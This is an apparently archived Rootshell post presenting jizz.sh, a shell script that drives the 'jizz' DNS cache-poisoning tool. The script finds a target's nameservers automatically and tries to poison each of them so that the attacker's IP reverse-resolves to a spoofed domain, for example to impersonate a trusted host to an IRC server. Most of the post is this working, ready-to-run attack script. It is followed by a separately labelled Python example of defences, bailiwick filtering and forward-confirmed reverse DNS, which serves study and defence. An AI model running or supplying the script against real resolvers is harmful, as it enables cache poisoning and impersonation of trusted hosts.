[ http://www.rootshell.com/ ]

From: philbert <philbert@DATATRAX.NET>
Subject: DNS "spoofing" simplified

A lot of people ask about DNS spoofing and how common utilities like
"jizz" work. Jizz and the like are not generally easy utilities to use
even if you do have an authoritative nameserver. The idea is not simple and
the instructions with such utils aren't very self-explanatory. On top
of that, even if you understand it completely, with any of them you have
to either know what the target is using as a caching nameserver or
otherwise make a calculated guess. I wrote a script interface tonight to
the commonly available jizz binary to make it a) a lot simpler to
understand and b) my script will automatically try to determine the
destination's nameserver and cache the domain on it, so that the only thing
required to enter after the nameserver info is set up is the IP of the
client, the domain name you want to spoof, and the destination server (IRC server
or whatnot). The script does the rest for you.

Please do not email me asking where to get jizz. If you don't have
it I'm not going to give it to you. Also the return email in the script
does not have an MX *yet*, so if you want to reach me I can be found on
IRC (EFnet) as philbert.

Here is the script:

--- begin jizz.sh ---

#!/bin/sh
#
# This script requires perl and the latest version of sh-utils for calculations,
# as well as other various standard unix utilities.
#
# This interface DOES NOT require you to know the caching nameserver of
# the destination server, it will attempt to calculate it for you.
#

case "${3}" in
"")
echo
echo "Intelligent DNS spoofer interface, by philbert."
echo "(philbert@DataTrax.Net)"
echo
echo "usage: $0 <your ip> <spoofed domain> <irc/misc server>"
echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"
echo
exit 1
;;
esac

# ----------------------------------------------------------
# Set the configurations for your nameserver here

# The name of the nameserver this is running on:
NS=ns3.datatrax.net

# The IP address of the nameserver this is running on:
IP=1.2.3.4

# A domain that this nameserver is strictly authoritative for:
AUTH=spoof.datatrax.net

# End of user configuration
# ----------------------------------------------------------

RAND=$RANDOM
export RAND

jizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &
sleep 1

if [ "$3" = "-ns" ]; then

echo "trying to cache $2 on $4..."
nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1

echo "$1 is cached on $4 as `nslookup $1 $4 | grep Name | cut -c10-`"

exit 1
fi

NS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`
if [ "$NS" = "" ]; then NS=$3; fi

echo "trying to cache $2 on the server itself..."

nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1

TEST=`nslookup $1 $3 | grep Name | cut -c10-`

if [ "$TEST" = "$2" ]; then
echo "Success! $2 is cached on $3 as $1"
else echo "Failed..."; fi

RDEST=`nslookup $NS | grep Name | cut -c10-`
if [ "$RDEST" = "" ]; then RDEST=$3; fi

NS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`
if [ "$NS" = "" ]; then
NS=`echo $RDEST | cut -f2- -d.`
NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`
fi

CRUNCH=1

while true ; do

TARGET=`echo $NS | cut -f$CRUNCH -d" "`

if [ "$TARGET" = "" ]; then
killall -9 jizz >/dev/null &
exit 1
fi

echo "trying to cache $2 on $TARGET..."
nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1
TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`

if [ "$TEST" = "$2" ]; then
echo "Success! $2 is cached on $TARGET as $1"
else echo "Failed..."; fi

CRUNCH=`expr $CRUNCH + 1`

done

--- end jizz.sh ---
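The trick the script relies on is that the target's caching nameserver accepts whatever extra records come back with the lookup it was induced to make for a name under the attacker's own zone, and that an IRC server or similar then trusts the resulting reverse lookup. As an added example (not part of philbert's post or the jizz tool), here are the two checks that defeat it, written in Python against constructed sample records: a bailiwick filter that discards records outside the zone the answering server is authoritative for, and forward-confirmed reverse DNS on the service side. The client IP 10.0.0.5, the spoofed name trusted.example.net and the forward-lookup table are assumptions.

```python
from typing import Callable, Dict, List, Tuple

Record = Tuple[str, str, str]  # (owner name, rrtype, rdata)

# Constructed sample, not from the post: what a caching resolver receives after
# being induced to look up <random>.spoof.datatrax.net. The SOA answer belongs to
# that zone; the PTR and A records are the extras that would make a reverse
# lookup of the assumed attacker IP 10.0.0.5 come back as trusted.example.net.
AUTH_ZONE = "spoof.datatrax.net."
SAMPLE_RESPONSE: List[Record] = [
    ("12345.spoof.datatrax.net.", "SOA",
     "ns3.datatrax.net. hostmaster.datatrax.net. 1 3600 600 86400 60"),
    ("5.0.0.10.in-addr.arpa.", "PTR", "trusted.example.net."),
    ("trusted.example.net.", "A", "10.0.0.5"),
]

def _norm(name: str) -> str:
    return name.lower().rstrip(".")

def in_bailiwick(owner: str, zone: str) -> bool:
    """True if owner is the zone apex or a name beneath it."""
    o, z = _norm(owner), _norm(zone)
    return o == z or o.endswith("." + z)

def filter_bailiwick(zone: str, records: List[Record]) -> List[Record]:
    """Keep only records the answering server is entitled to speak for;
    everything else (here the in-addr.arpa PTR and the foreign A record)
    is dropped instead of being cached."""
    return [rr for rr in records if in_bailiwick(rr[0], zone)]

def forward_confirmed(ip: str, ptr_name: str,
                      lookup_a: Callable[[str], List[str]]) -> bool:
    """FCrDNS: a service accepts a PTR name only if that name's own A records
    (fetched via lookup_a from the real authority) include the client IP."""
    return ip in lookup_a(ptr_name)

# Constructed stand-in for a forward lookup against the genuine authority for
# trusted.example.net; 192.0.2.10 is an assumed address.
REAL_A: Dict[str, List[str]] = {"trusted.example.net.": ["192.0.2.10"]}

def lookup_a(name: str) -> List[str]:
    return REAL_A.get(name, [])

if __name__ == "__main__":
    kept = filter_bailiwick(AUTH_ZONE, SAMPLE_RESPONSE)
    print("records a careful resolver caches:", [rr[0] for rr in kept])
    print("PTR survives forward confirmation:",
          forward_confirmed("10.0.0.5", "trusted.example.net.", lookup_a))
```

With both checks in place the poisoned PTR never enters the cache, and even a cache that did accept it would not satisfy a service that forward-confirms the name.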